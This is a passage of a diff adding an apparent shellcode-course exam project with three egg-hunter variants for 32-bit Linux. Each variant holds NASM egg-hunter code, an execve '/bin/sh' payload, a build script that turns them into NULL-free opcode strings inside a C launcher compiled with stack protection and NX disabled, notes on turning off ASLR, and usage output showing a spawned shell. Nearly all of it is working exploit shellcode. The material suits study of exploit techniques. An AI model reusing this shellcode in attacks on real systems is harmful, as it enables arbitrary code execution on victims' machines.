+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"

exam3/access-scasd/payload.nasm

@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+

exam3/access-scasd/shellcode.c

@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}

exam3/access/NOTES

@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program

exam3/access/USAGE

@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access$ ./shellcode 
+Hunter Length:  44
+Payload Length:  36
+sh-4.1$ 

exam3/access/hunter.nasm

@@ -0,0 +1,59 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm *access modification
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+	xor edx, edx	; Searching the whole memory
+
+
+	; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+	or dx, 0xfff	; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+	inc edx		; Searching forward
+
+	; Checking if memory is accessible
+	push byte +0x21		; 0x21 = 33 = __NR_access
+	pop eax			; EAX points to 0x21
+	lea ebx, [edx+0x8]	; next address to check
+	xor ecx, ecx		; 0: mode = F_OK
+	int 0x80
+	cmp al, -14		; -14 = EFAULT = Bad address.  See /usr/include/asm-generic/errno-base.h
+	jz nextPage
+
+
+        ; Searching for the Egg marker (in current page of memory which is accessible)
+	cmp dword [edx], egg1
+	jne nextAddr
+	cmp dword [edx+0x4], egg2
+	jne nextAddr
+
+	lea ecx, [edx+0x8]
+	jmp ecx
+

exam3/access/make.sh

@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"

exam3/access/payload.nasm

@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+

exam3/access/shellcode.c

@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}

exam3/basic/NOTES

@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program

exam3/basic/USAGE

@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+basic$ ./make.sh "egg.MaRk"
+ [I] Using custom EGG mark: egg.MaRk
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+basic$ ./shellcode 
+Hunter Length:  21
+Payload Length:  36
+sh-4.1$ exit

exam3/basic/hunter.nasm

@@ -0,0 +1,40 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+	; Searching for the Egg marker
+next:
+	inc eax		; Searching forward  (can also try dec eax)
+isEgg:
+	cmp dword [eax-8], egg1		; Checking if we can see egg1
+	jne next			; If not, continuing to search
+	cmp dword [eax-4], egg2
+	jne next
+
+	call eax			; Once found, we call our payload

exam3/basic/make.sh

@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"

exam3/basic/payload.nasm

@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+

exam3/basic/shellcode.c

@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}